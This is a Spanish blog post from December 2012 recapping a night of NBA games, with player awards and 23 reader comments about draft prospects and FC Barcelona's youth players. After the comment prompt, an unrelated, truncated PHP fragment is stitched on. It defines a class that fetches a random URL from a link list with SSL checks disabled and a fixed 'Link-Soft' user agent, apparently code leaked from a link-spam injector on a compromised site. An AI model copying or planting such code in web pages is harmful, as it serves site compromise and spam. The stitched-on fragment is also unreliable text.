La Crónica: Ni con Pau ni sin Pau

08 de December de 2012 por Sancho88

Si no defiendes, es imposible ganar un partido, aunque anotes 108 puntos. Los Lakers perdieron anoche contra los Thunder (108-114) sin Pau una vez más, pero con los mismos problemas atrás de siempre. Entre Durant y Westbrook les metieron 69 puntos, y de nada valió el partidazo de Kobe Bryant (35-3-7) ni de Dwight Howard (23-18). Ambos perdieron muchos balones (17 pérdidas de equipo en total), pero la clave fue que solo Meeks y Duhon les acompañaron en la anotación, pero nadie defendió, propiciando muchas segundas oportunidades con las pérdidas de balón, y generando canastas fáciles de los Thunder. Una vez más, a Metta World Peace se le fundieron los cables contra los pupilos de Scott Brooks. Anoche quiso asesinar a Serge Ibaka. No pierde jamás su espíritu callejero, pero me temo que esta vez habría salido mal parado si ‘Air Congo’ hubiese querido actuar. En L.A. Pau Gasol no es el único problema. Ni de lejos. Pero lo van a tener que traspasar si quieren aspirar a algo. Con su triste sombra caminando por la pista no pueden aspirar a mucho.

En Philadelphia los Celtics tuvieron muchas opciones para llevarse el partido en la prórroga (94-95), pero un canastón de Evan Turner a falta de 4 segundos lo echó todo por tierra. En la última jugada, Rondo intentó quitarse de encima la fama de mal definidor, como Lebron contra Washington hace varias noches. Pero no hubo manera, el balón ni siquiera tocó aro en un lanzamiento relativamente cómodo. Como bien apuntó Pop durante la madrugada, Rondo ya tenía encarrilado el triple-doble desde el tercer cuarto, y al final del partido se fue a casa con 16 puntos, 13 rebotes y 14 asistencias, además de 3 robos de balón y 3 tapones. Pero no sirvió de nada. Quizá, descubramos un finalizador con la vuelta de Avery Bradley, pues gran parte de las victorias verdes llegan en los finales apretados. O llegaban, más bien, en el año I a.R. Allen. El propio Turner fue el mejor del partido con 26 puntos y 10 rebotes, y en la prórroga también fue decisiva la aportación de Thaddeus Young, al que le sienta muy bien su nuevo rol de titular esta temporada. Otro doble-doble en su cuenta (17-12). En Boston vimos buenas actuaciones de Jeff Green desde el banquillo (como siempre), Garnett estuvo en sus números, Pierce, aunque demasiado fallón (1/8 en T3), se fue hasta los 27 puntos y Jason Terry fue la gran decepción con 4 puntos y 1/12 en TC. No obstante, no es su tónica habitual esta temporada, donde está rindiendo a un gran nivel.

En Indiana los Nuggets nos sorprendieron con una victoria apretada y a pocos puntos sobre los Pacers (92-89), lo que demuestra que si defienden pueden optar a ganar este tipo de partidos. El banquillo estuvo fantástico anotando 57 de 92 puntos totales, con Brewer y McGee a la cabeza. Pocas veces en toda su carrera ha estado más centrado este grandullón. Ayer 9/9 en TC, una proeza que cabe reseñar. Además, los partidos saben mejor con Andre Miller que con Lawson. Mal el base titular y, sin embargo, muy bien el veterano. En los Pacers George Hill pudo llevar el partido a la prórroga, pero falló el triple final. Esta vez no fue el factor X del equipo, pero le hemos visto un gran recital de tiros ganadores en lo que va de año. Paul George fue el mejor de los suyos con 22 puntos, 6 rebotes y 6 asistencias.

Los Warriors no van de farol. Ayer se consolidaron en el Top 5 del Oeste con una gran victoria en casa de los Nets (109-102). Es la segunda vez en 17 días que logran la victoria contra los hombres de Avery Johnson, y, como en el anterior capítulo, David Lee volvió a ser protagonista. El ex de los Knicks no perdona ni una a sus antiguos vecinos, y cuando tiene ocasión les prepara un buen desaguisado. Anoche 30 puntos y 15 rebotes (7 de ellos ofensivos), con un magnífico 14/22 en TC. Stephen Curry fue su particular ayudante, con 28 puntos y 5 triples anotados. También estuvo muy bien Jarrett Jack desde el banquillo, y el rookie Draymond Green con 10 rebotes. Como bien apuntamos en el anáilsis previo, este chico parecía una gran apuesta para Mark Jackson, y así lo está demostrando tras las lesiones de Brandon RushAndrew Bogut y Richard Jefferson, aprovechando sus minutos para aportar intensidad y corazón. En los Nets el mejor volvió a ser una noche más el resucitado Andray Blatche (22-15). Junto a Deron Williams y Joe Johnson formaron un ‘Big three’ de altos vuelos (77 de los 102 puntos de Brooklyn). Jo-Jo anotó 32 puntos con unos buenos porcentajes (12/23 en TC), pero los Nets necesitan imperiosamente a López. Con él en pista, y Blatche haciendo de 4 el equipo tendría más sentido. Kris Humphries no aporta absolutamente nada. Ayer, 4 puntos y 4 rebotes en 23 minutos. Así se lleva él 12 millones para casa. Debería ser suplente tras la vuelta del pívot titular. Blatche le ha ‘comido la tostada’ completamente.

Victoria sencilla de los Hawks en casa contra los Wizards (95-104). La pregunta es, ¿pasarán este año de primera ronda? Seguro que si mantienen su 3º puesto de Conferencia Este y consiguen la ventaja de campo tendrán muchas opciones. Josh Smith fue el mejor de los ‘halcones’ con 23 puntos y 15 rebotes, bien acompañado por el 14-14 de Al Horford. El resto del quinteto (Stevenson, Harris, Teague) también sumaron dobles figuras en anotación, y por parte de los Wizards el mejor fue Kevin Seraphin desde el banquillo (19-7). Sorprendente los 18 puntos del rookie Bradley Beal. A ver si espabila.

En Detroit los Bulls de Joakim Noah se llevaron una apretada victoria contra los Pistons (108-104). Espectacular la transformación física de Noah, que ahora sí nos recuerda a aquel prodigio físico que salió de la Universidad de Florida. El ex ‘Gator’ ha perdido kilos por todos los lados y ahora sí puede moverse en ataque como Dios manda. 30 puntos, 23 rebotes (10 de ellos ofensivos) y 6 asistencias. Sí, lo habéis adivinado. Fue el mejor partido de su carrera. Entre él y Boozer anotaron 54 puntos, y así los Bulls no echaron en falta ni a Rose ni a Hamilton. Y pensar que estos fueron los mismos jugadores que jugaron aquella primera ronda contra los Sixers… Menudo cambio. También rindieron bien Deng, Bellinelli y Hinrich, todos ellos por encima de los 10 puntos, y en los Pistons decepcionó quien no suele decepcionar, y sorprendió quien no suele sorprender. Malos partidos de Monroe y Singler y muy buen partido de Rodney Stuckey. 24 puntos y 7 asistencias que le postulan a entrar de nuevo en el quinteto, aunque la temporada de los Pistons vuele a ser intrascendente un año más. Ya da igual lo que hagan hasta el final de temporada.

En NOLA, los Grizzlies consolidaron su liderato (96-89) de la mano de un gran Rudy Gay (28 puntos y 8 rebotes). Marc y Randolph le acompañaron para anotar un total de 56 de los 96 puntos del equipo entre los tres, y Quincy Pondexter les ayudó desde el banquillo con otros 16 puntos. En los Hornets no jugó Aminu y Xavier Henry no lo hizo mal en su lugar. Mediocre partido de los nuevos ‘Pelicans’, donde solo destacaron jugadores de banquillo como los rookies Austin Rivers y Brian Roberts, y el ala-pívot Jason Smith. A ver si Rivers se entona y empieza a jugar así siempre. Ayer 15 puntos y 7/13 en TC.

Kevin Love guió a los Wolves en una fácil victoria contra los ‘Cavs’ (73-91), anotando 36 puntos y 13 rebotes. Volvio Kirilenko con 8 puntos, 7 rebotes, 6 asistencias, 4 robos y 3 tapones (Rey de los intangibles) y Minnesota sigue poniendo todo a punto para la gran fiesta en honor al regreso de Ricky Rubio. No sabemos cuándo va a ser, pero puede ocurrir de un momento a otro. Los Wolves van a molar, y mucho. En los Cavaliers, las 20 pérdidas fueron el factor decisivo para la derrota, y Anderson Varejao puso punto y final a su intento de record y dejó su cifra de dobles-dobles con más de 15 rebotes y 5 de ellos ofensivos en 10. No pudo superar finalmente los 12 partidos consecutivos de Moses Malone en esos números. Anoche solo anotó 4 puntos y 14 rebotes en el pobre partido ofensivo de los suyos. Cuando vuelva Irving, los Cavs solo aspirarán a hacer buen basket, porque el tren de los Playoffs ya lo han perdido.

En Milwaukee los Bucks se llevaron la victoria contra los Bobcats (93-108) de la mano de Ersan Ilyasova. El alero turco jugó el mejor partido de la temporada con 21 puntos y 12 rebotes en solo 20 minutos en pista, y Marquis Daniels le ayudó con 18 puntos desde el quinteto. Brandon Jennings no lo hizo mal dirigiendo y en los Bobcats solo destacó Gerald Henderson con 19 puntos desde el banquillo, en un mediocre partido de Charlotte. 3/13 en triples, con Mullens y Haywood muy perdidos. Sin embargo, el rookie Michael Kidd-Gilchrist estuvo bien con 11 puntos y 11 rebotes.

Hasta 6 hombres de los Spurs sumaron 10 o más puntos para llevarse un descafeinado ‘derby’ texano contra Houston (92-114). Popovich administró muy bien las rotaciones y todos pudieron aportar. Parker fue el mejor con 17 puntos y 7 asistencias, y Tim Duncan sumó un doble-doble (12-12). Muy bien desde el banquillo la aportación de Tiago Splitter (15 puntos, 6 rebotes, 6/7 en TC), y en los Rockets de nada valieron los 29 puntos de James Harden. Vergonzosa actuación de Omer Asik (0 puntos, 5 pérdidas de balón y 0/6 en TC), y muy mal también Chandler Parsons y Jeremy Lin. Al menos, anoche McHale nos dejó ver a Terrence Jones. 9 puntos, 3 rebotes y 2 asistencias en 7 minutos y medio. Son sus credenciales, pero de momento no le valen para jugar muchos minutos, por desgracia.

Los Jazz se pegaron una merendola a costa de los tiranosaurios Raptors, que una noche más, más que dinosaurios fueron réplicas de ‘Piesito’ en busca del Valle Encantado. Nadie nos esperábamos esta gran decepción de los canadienses. Lowry va a su bola y el equipo no funciona en defensa. Esperábamos más del trabajo de Casey desde el banquillo. No ha conseguido absolutamente nada con estos chicos. En Utah hasta 8 jugadores participaron en el escandaloso (99-131) anotando más de 10 puntos, con unos porcentajes de vértigo en triples (13/23) y 51 rebotes. Millsap fue el mejor con 20 puntos y 10 rebotes, el quinteto rindió muy bien, Mo Williams estuvo más generoso que de costumbre (11 puntos y 10 asistencias) y el Energy Solutions fue una vez más la panacea de los mormones. Hasta Jeremy Evans y DeMarre Carroll jugaron bien, y ningún jugador del equipo se quedó por debajo de los 5 puntos.

Por último, los Kings encadenaron su segunda victoria consecutiva contra los Magic (82-91). Muy buen partido de DeMarcus Cousins (17 puntos, 14 rebotes), y los cuestionados Isaiah Thomas y Jimmer Fredette anotaron 17 y 15 puntos respectivamente para seguir luchando por un puesto en el equipo. Ayer fueron cuestionados por Bobby Jackson (aka Mr. Magoo en aquellos míticos Kings), y ahora asistente de Keith Smart. Y los dos han respondido, porque Jackson ha pedido oficialmente el traspaso de uno de ellos. No jugó Tyreke y ellos demostraron que pueden hacer grandes cosas. En los Magic, doble-doble de Glen Davis (20-11) y buenos partidos ofensivos de Nelson y Afflalo que no valieron para nada. Muy bien el rookie Andrew Nicholson con 14 puntos y 5 rebotes desde el banquillo.

PREMIOS

MVP: Joakim Noah. 30 puntos (12/19 en TC, y 6/7 en TL), 23 rebotes (10 ofensivos), 6 asistencias, 2 robos de balón y 2 tapones en 43 minutos. Grandiosos números del pívot francés, que se comió a Greg Monroe con patatas y firmó el mejor partido de su carrera deportiva. Otras grandes actuaciones de ayer fueron protagonizadas por Rudy Gay (28-8) en la victoria contra los Hornets, Kevin Love (36-13) en la paliza a los Cavs, Evan Turner (26-10) en la victoria de los Sixers contra Boston, el 20-10-5 de Paul Millsap contra los Raptors, el 30-15 de David Lee para conquistar Brooklyn, el 23-15 de Josh Smith contra los desahuciados Wizards, los 36 puntos, 9 rebotes y 4 asistencias de Kevin Durant en la victoria contra Lakers, y del base Russell Westbrook en ese mismo partido (33 puntos y 8 asistencias), y DeMarcus Cousins con 17 puntos, 14 rebotes y 4 asistencias en la victoria de los Kings contra Orlando.

Rookie: Hubo buenos rookies anoche sobre la cancha, aunque solo uno de ellos le dio la victoria a su equipo. El sorpresivo Draymond Green, con 6 puntos, 10 rebotes, 3 asistencias y 3 robos de balón fue fundamental en los últimos minutos del GSW-BKN, y por eso se lleva el premio hoy; Bradley Beal también jugó a buen nivel anoche. 18 puntos (5/12 en TC), 3 rebotes y 3 asistencias en la derrota de los Wizards. Michael Kidd-Gilchrist estuvo bien (11-11) en la derrota de los Bobcats, y Andrew Nicholson con 14 puntos también en la derrota de Orlando en Sacramento. En los Hornets, Austin Rivers y Brian Roberts se combinaron para anotar 30 puntos entre los dos, pero los Hornets cedieron la cuchara contra Memphis.

Sorpresa: Otros días lo ponemos a caldo en las decepciones, pero anoche jugó un partido decente por fin Rodney Stuckey. 24 puntos y 7 asistencias para la redención del combo-guard, aunque sus Pistons perdieron. También sorprendente fue la vuelta al estrellato de Ersan Ilyasova, con 21 puntos y 12 asistencias. Le sienta bien la suplencia, y en la última semana está jugando de fábula. El 10-5 de Jeremy Evans no pasa todos los días, aunque ayer contra los Raptors había buffet libre. Por último, el 9/9 en tiros de campo de JaVale McGee también nos agrada. 20 puntos y 8 rebotes para el hombre de los mates raros a dos metros de canasta.

Decepción: Omer Asik. 0 puntos, 5 rebotes, 0/6 en tiros de campo y 5 pérdidas de balón.Vale, no es fácil jugar contra Duncan y Splitter, pero el tipo está cobrando mucha pasta. Debería haber hecho algo más. Los 6 puntos y 4 rebotes de Jonas Valanciunas también nos decepcionan. No está demostrando prácticamente nada en su temporada rookie. Esperábamos mucho más de él. En los Bobcats la pareja titular MullensHaywood apenas jugó, y aportaron muy poquito: 7 puntos y 7 rebotes entre los dos. Los 2 puntos y 3 rebotes, con 1/6 en tiros de campo de Robin López son deprimentes como poco, así como el 1/12 de Jason Terry en la derrota de los Celtics y el 1/10 de Ty Lawson en la victoria de su equipo contra los Pacers, pero no gracias a él, precisamente. Lo de Kris Humphries también nos decepciona. 4-4 en 20 minutos. Pasa muy inadvertido en los nuevos Nets. También mal partido de Kyle Singler contra los Bulls. 2 puntos y 3 rebotes con un 1/6 en TC. Estuvo fatal el mormón.

Esfuerzo en vano: El triple-doble de Rajon Rondo. 16 puntos, 13 rebotes, 14 asistencias, 3 robos de balón y 3 tapones que se van al limbo. Pudo ganar el partido y convertirse en el MVP de la noche, pero él mismo se relegó al MEV con una castaña pilonga que no tocó ni aro. Kobe Bryant también compró muchas papeletas para este premio, con 35 puntos y 7 asistencias que no sirvieron para nada. Dwight Howard, con sus 23 puntos (5/7 en TL) y 18 rebotes (6 de ellos ofensivos), tampoco pudo evitar la derrota de los Lakers. En los Rockets los 29 puntos de James Harden no sirvieron ni siquiera para asustar a los Spurs, así como el 20-11 de Glen Davis en Sacramento, el 24-1-7 de Stuckey contra los Bulls, los 77 puntos combinados de Blatche, Joe Johnson y Deron Williams contra los Warriors o los 22 puntos de Paul George en la derrota contra los Nuggets.

Imágenes | AP Photos / Getty Images

Comenta

23 comentarios a esta entrada

  1. arvydas dice:
    #1

    Algunas veces McGee sique siendo el mismo, http://sinbapointforward.files.wordpress.com/2012/12/javale1.gif se la pasa por la espalda cual base y luego la lia… Menudo crack!!

      Citar

  2. Pikerton64 dice:
    #2

    Grandísimo resumen Sancho, pedazo de currada como se suele decir, y has conseguido que lea hasta partidos irrelevantes para mí como el de Milwaukee o el ORL-SAC.

    Los que apoyen el MVP para Love que vean el partido de ayer para que lo usen como apoyo. Secó totalmente a Varejao en el apartado de rebotes en la primera mitad, defendió, corrió a por balones sueltos… y claro, lo que suena, los 36 puntos a base de tiros libres (entre él y Barea deben de matar de impotencia a los rivales) y a que metió triples y mejoró juego interior. O lo que es lo mismo, vuelve a jugar como cuando volvió, y no como en los últimos partidos (el de Boston, el 6pts-10rbs de Philadelphia, el 5-19 FG o el 3-12 FG de antes). También es debido a lo que dice Sancho, que me alegra muchísimo: Kirilenko. Es impresionante la energía de AK47, que parece no tener respeto a su cuerpo o no tener miedo: ¡cómo lucha cada pelota! Los rebotes o balones sueltos, la defensa a la línea de perímetro, a bases, a pívots, a aleros, su esfuerzo. Eso motiva al equipo a jugar, el ver que tienen buenos jugadores al lado, que no son Amudson o Conroy sino Kirilenkos. El resto, los suplentes ayer mal, pero sobre todo lo desaparecido que está Pek. Cuando volvió de la lesión lo hizo fortísimo, pero se ha diluído. El equipo no le busca y bueno, hay que reconocerlo, no tiene movimientos en el poste. Veremos si Ricky lo mejora, porque Pekeñovic le echa muchísima casta, y no se anda con cursilerías ni teatro ni nada.
    Mala suerte Cleaveland la lesión de Irving (y su dueño en la Hoops) y la ausencia ayer de Waiters. Además, Zeller y Thompson con máscara, maltrechos.

    Comentarios a otros partidos: GSW tiene un equipo genial, con Curry y Lee claro pero también Thompson, el banco, los rookies… y aún falta Bogut. Me alegro también por Memphis, por Marc y por el equipo en general. Han demostrado que no hace falta fichar AllStars o pagar millonadas a jugadores que luego criticarás a muerte, sino que basta con juntar jugadores maduros en cada posición, que sepan jugar y cual es su rol. Esto último es lo más importante. Conley y Allen están ambos en el top 5 robos por partido. Z-Bo en AllStar mode y Marc y Gay jugando para ganar, parecen indicar los números y resultados, pues no les he visto jugar. Y un banquillo cumplidor, claro. San Antonio como siempre favorito, al menos para mí, habiendo derrotado también a Memphis. Y esto sin Leonard o Jackson. Pues bien, mi pregunta es, si LAL entra en playoffs (algo que todos damos por asumido…) y queda por detrás de Clippers en la división ¿que pasaría si se enfrentan a Memphis, Spurs o incluso OKC en primera o segunda ronda? Sería una serie muy interesante, y una decepción segura para el perdedor. Lástima Toronto, pena por Charlotte y molestia con Houston y su no-rookies.

    Siento comentarios tan largos, dicen que los latinos somos muy de hablar mucho, xd.

      Citar

  3. nba dice:
    #3

    Yo creo que Pekovic puede estar acusando toda la rumorologia sobre trades, el hecho de que Kahn saliese a desmentir traspasos me huelen a tufillo, alguien recuerda como apoyaban publicamente tanto Buss como Bryant a Brown?, y un par de horas despues fue cesado de su cargo.
    En Toronto parece que se han pegado un tiro en el pie con la contratacion de Lowry, si se supone que Valanciunas debe ser su proyecto de jugador franquicia ,pues hay que dejarle las cosas claras a Kyle, sino mal acabara la cosa

      Citar

  4. Denise dice:
    #4

    nba:

    En Toronto parece que se han pegado un tiro en el pie con la contratacion de Lowry, si se supone que Valanciunas debe ser su proyecto de jugador franquicia ,pues hay que dejarle las cosas claras a Kyle, sino mal acabara la cosa

    No entendo porque dices eso de Lowry. Es lo más potable de los Raptors, si éstos tuvieran mejor balance y Lowry fuese más mediatico, creo que jugaría el All-Star y encima no cobra más de 6 millones. Para mi fichajazo.

    El problema de los Raptors es simplemente que nadie quiere ir a jugar allí, y para fichar a un crack, deben atraerlo pagandole un pastizal. Después deportivamente, tienen 3 grandes problemas, Calderón y su contrato, la irregularidad de De Rozan y el paquete sobrepagado de Amir Johnson. Y si fuera GM estaría abierto a traspasar a Bargnani + Amir Johnson/De Rozan/expiring de Calderón por algun jugador importante de la liga. Si no hacen un movimiento a gran escala, creo que este equipo no va a ningun sitio a corto plazo a no ser que tengan mucha suerte y consigan algun supercrack en el Draft, que no sé como andará la NCAA de cracks proximamente.

      Citar

  5. Txusma dice:
    #5

    arvydas:
    Algunas vecesMcGee sique siendo el mismo, http://sinbapointforward.files.wordpress.com/2012/12/javale1.gif se la pasa por la espalda cual base y luego la lia…Menudo crack!!

    Quás lástima de cabeza! Pq cualidades físicas no le faltan.

      Citar

  6. Denise dice:
    #6

    Txusma: Quás lástima de cabeza! Pq cualidades físicas no le faltan.

    McGee está haciendo una muy buena temporada con Denver. Lo que no entiendo es por qué Karl lo hace jugar tan poco y no le da confianza, la que si le da a ese jugador tan limitado y siempre cargado de faltas como Koufos.
    Los que están muy mal son Gallinari e Iguodala, no sé si es que son incompatibles y se pisan el terreno el uno al otro, pero estan muy mal, una de las claves de la pésima temporada de los Nuggets hasta la fecha.

      Citar

  7. Denise dice:
    #7

    En el LAC-PHX muy buen partido de Beasley por el momento, el mejor que yo le haya visto ultimamente, además, los Suns están haciendo la goma, y da la sensación de que los Clippers en culaquier momento pueden romper el partido superando la barrera psicologica de los 10 puntos, pero en ese momento llega Beasley y las está enchufando tirando del carro de los Suns como nunca.

    Por los Clippers, Griffin y Paul van a hacer facilemnte un doble-doble, y están contando con la ayuda desde el banco de Barnes y sorprendentemente de Odom, que está dando muy buenos minutos.

    Creo que ganaran los Clippers, porque hasta el momento van ganando pese a que Butler, Crawford o Bledose ni aún han aparecido, y encima a los Suns le entra todo desde el triple y el tiro libre, cuando dejen de anotar por esas dos vias, temo que acabarán claudicando. Además, las tontas perdidas de balón de Dragic los están matando

      Citar

  8. Ruxixón dice:
    #8

    Denise: consigan algun supercrack en el Draft, que no sé como andará la NCAA de cracks proximamente.

    Este próximo año va a ser un año malo,Cody Zeller,el hermano de Tyler el de Cleveland se postula número1,y es buen jugador,hecho pero con falta de músculo,tiene mucha clase.Luego estará Noel que es un miniCamby y luego ya son todo incógnitas pero parece claro que no habrá superclases -Muhammad que es uno de los más prometedores creo que debería quedarse un segundo año- ,a diferencia del año 2014 donde viene una camada impresionante a priori.Así que para obtener una solución para Raptors en el draft chungo.

      Citar

  9. Denise dice:
    #9

    Ruxixón: Este próximo año va a ser un año malo,Cody Zeller,el hermano de Tyler el de Cleveland se postula número1,y es buen jugador,hecho pero con falta de músculo,tiene mucha clase.Luego estará Noel que es un miniCamby y luego ya son todo incógnitas pero parece claro que no habrá superclases -Muhammad que es uno de los más prometedores creo que debería quedarse un segundo año- ,a diferencia del año 2014 donde viene una camada impresionante a priori.Así que para obtener una solución para Raptors en el draft chungo.

    OK, y que venga de Europa via Draft, no sé me ocurre nadie, ningun jovenzuelo ahora mismo por aquí con clase para ser estrella.

    Vaya duelo Mayo-Harden, brrrrrrrr

      Citar

  10. melo15 dice:
    #10

    Bueno de Europa haber si se animan a dar el salto Dario Saric que tiene una pinta de Kukoc brutal y un interior frances que ahora no me acuerdo como se llama.

      Citar

  11. Sancho88 dice:
    #11

    Kuzmic en la Peña, Abrines, Hezonja, Rabaseda y Todorovic en el Barsa, Saric en la Cibona no? Pero eso, quedaos con Kuzmic. Ese tio es el jefe. Y con Luke Sikma

      Citar

  12. nba dice:
    #12

    Vaya, vaya parece que en LA estan pensando seriamente en sacar a Pau desde el banquillo, un golpe duro para el ego de Pau, pero sin duda de esa manera podrá desplegar el juego donde viene reclamando tanto

      Citar

  13. Denise dice:
    #13

    Sancho88:
    Kuzmic en la Peña, Abrines, Hezonja, Rabaseda y Todorovic en el Barsa, Saric en la Cibona no? Pero eso, quedaos con Kuzmic. Ese tio es el jefe. Y con Luke Sikma

    A Kuzmic y Hezonja no los he visto, pero macho…Abrines. Rabaseda y Todorovic…pffff, me parece muy bien que sean jovenes y tengan potencial, pero macho, esos 3 no son absolutamente nadie en Europa. Asi es como se trunca la carrera de muchos jugadores, gente de 20 años con potencial pero siendo Don Nadies y se creen el amo de la canasta y se van para allá.

      Citar

  14. Sancho88 dice:
    #14

    Ok, pero tampoco les están dando ninguna oportunidad. Kuzmic doy garantías personales, lo vi en persona el año pasado cuando jugaba con Benahavís contra Palencia. Y este año está jugando muy bien. Va ganando movilidad y atrás es un imán para coger rebotes. Si se vuelve más ágil, es una perla. Creo que está drafteado, pero no sé por quién. Sikma hay que verle también. El año pasado en La Palma y este año en Burgos. IQ muy por encima de lo normal, creo que su padre es asistente en algún equipo de la NBA y tb. fue jugador NBA. Además, tiene impresionante mano, este podría ser un falso 4 abierto de estos, pero no creo que llegue tan lejos. Eso sí, me juego todo lo que tengo a que acabará en la ACB dentro de poco. Eso seguro

      Citar

  15. Denise dice:
    #15

    Ya Sancho, pero todo viene de que dije que los Raptors solo podran conseguir un proyecto ganador via Draft si en sus proximas elecciones obtuvieran un crack (tipo Irving, Davis, Cousins) y ninguno de los que me nombras creo que en 3 años será un jugador del nivel de jugador franquicia. Creo que del basket europeo no saldrá un gran jugador franquicia tipo Pau, Dirk o Parker en los proximos 3 años.

    PD: Kuzmic, pick 52 de GSW en 2012.

      Citar

  16. nach dice:
    #16

    nba:
    Vaya, vaya parece que en LA estan pensando seriamente en sacar a Pau desde el banquillo, un golpe duro para el ego de Pau, pero sin duda de esa manera podrá desplegar el juego donde viene reclamando tanto

    Pues puede ser algo muy positivo para el equipo, tendrían una referencia clara en la segunda unidad

      Citar

  17. Sancho88 dice:
    #17

    Denise:
    Ya Sancho, pero todo viene de que dije que los Raptors solo podran conseguir un proyecto ganador via Draft si en sus proximas elecciones obtuvieran un crack (tipo Irving, Davis, Cousins) y ninguno de los que me nombras creo que en 3 años será un jugador del nivel de jugador franquicia.Creo que del basket europeo no saldrá un gran jugador franquicia tipo Pau, Dirk o Parkeren los proximos 3 años.

    PD: Kuzmic, pick 52 de GSW en 2012.

    No se sabe Denise, fíjate en Pau, era un don nadie y en un año se convirtió en un crack. Y que ahora no venga nadie diciendo que era la hostia en su etapa junior, que yo lo vi algunos partidos cuando empezó… y madre mía, no había por donde cogerlo. Hasta Sonseca era mejor… así que nunca te sabe. Lo mismo se te planta un gigantón por ahí que nadie sabe de donde ha salido… y la lia. Motiejunas, Valanciunas… o gente mejor

      Citar

  18. melo15 dice:
    #18

    Bueno Denise, yo si creo que hay jugadores interesantes este año, Alex Pythrees un 3 alto y atletico, Kyle Anderson un point-forward de 2.06 con buena mano. Ademas estan Rasheed Sulaimon, Marcus Smart y el escolta de Duke que son bastante buenos. Y en cabeza estan Zeller que tiene una pinta de Pau tremenda, Noel y Muhammad.

    Pero en realidad la camada buena es la siguiente con gente como Jabari Parker, Julias Randle…que son jugones de cuidado.

      Citar

  19. Toni dice:
    #19

    Hezonja llegará. Escolta y si gana músculo tendrá potencial para jugar de 3. 17 Años, 2.01, croata. El barça pagó por él 1 millón de euros este verano. Arma rápido y puede crearse sus tiros. Eso si, es del 95 y está muy verde, pero a pesar de ello tiene mucha capacidad de liderazgo. Fuera de la pista es más bién tímido y no sabe demasiado castellano aún y los culés lo estan mimando mucho. Si Abrines y Rabaseda no espavilan, el chico los va a pasar por la derecha antes de que acabe la temporada porque está entrenando asiduamente con el primer equipo y en LEB oro se está saliendo.

      Citar

  20. txusma dice:
    #20

    Creo haber leído que le habían propuesto a Abrines irse cedido y que él no había aceptado. Debería hacerlo pq se está estancando mucho. A su edad se necesitan minutos donde sea, un equipo bajo de la ACB o uno alto de la LEB, es igual. Lo importante es jugar.
    Rabaseda cumple su rol en los minutos que tiene en pista y debería ser el sustituto natural de Navarro pq Hezonja meda que pasará poco tiempo en el club.

      Citar

  21. Sancho88 dice:
    #21

    Es que, es difícil entender la planificación de la plantilla del Barsa, no hay por donde cogerla. Para qué han fichado a Jasikevicius si con Sada y Huertas les valía? Luego, en aleros, si tienes a Hezonja, Rabaseda y Abrines, para qué tienes a Mickeal e Ingles? Con esos dos bichos jamás tendrán su oportunidad estos jugadores. Vale, pones a Rabaseda de suplente de Navarro, y dejas a Mickeal, pero al menos vende a Ingles y así das oportunidades a Abrines y Hezonja. Después, en la pintura, para qué coño tienen a CJ Wallace si no le sacan? No se supone que tienes a Todorovic para convertirle en un nuevo Mirotic? No rasca bola de momento. Y, por último, el australiano, el gordo, solo sabe colgarse haciendo alley-hoops y hacer faltas con cojones. No se… el proyecto anda un poco descabezado este año, no sé cómo dejaron irse a Ndong, y en general, no sé que quieren hacer con sus perlas de la cantera.

      Citar

  22. txusma dice:
    #22

    Hombre, Ingles no es precisamente veterano y tb está tapado por Navarro. Entre Ingles y Rabaseda yo me quedo con el australiano ahora mismo.
    Además, hablamos del Barça. Como van a echar a Mickael, Ingles o CJ Wallace para dar tiempo a los imberbes? Se puede armar la marimorena si, por ejemplo, no se clasifican para los playoffs del título o caen en Euroliga. Los jóvenes han de entrar poco a poco. Hezonja está bien en el B, Abrines debería irse cedido y Todorovic más de lo mismo.

      Citar

  23. Sancho88 dice:
    #23

    Entonces, no se puede entender que estén en el Barsa. No sé, deberían estar en la Penya donde van a jugar seguro, no en el barsa… y si son ellos que no quieren irse cedidos, entonces son culpables de no progresar y se posicionan en la cabezonería de Fran Vázquez y de Mirotic, al que parece que también le han sorbido el seso, porque hasta lo que yo he oído, dice que se quiere quedara hasta 2015 o por ahí. Estamos todos locos… joder, si hasta el Claver se ha pirado. Vale, que se vaya siendo un pakete guay, si allí le acogen, yo también me iría. Pero todos estos, que pueden llegar y ser proyectos de estrellas y alguno seguro que llega, que digan que se quieren quedar chupando banquillo en el barsa o amargándose en el madrid jugando 20 minutos cada semana… ya me dirás. Es incomprensible

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>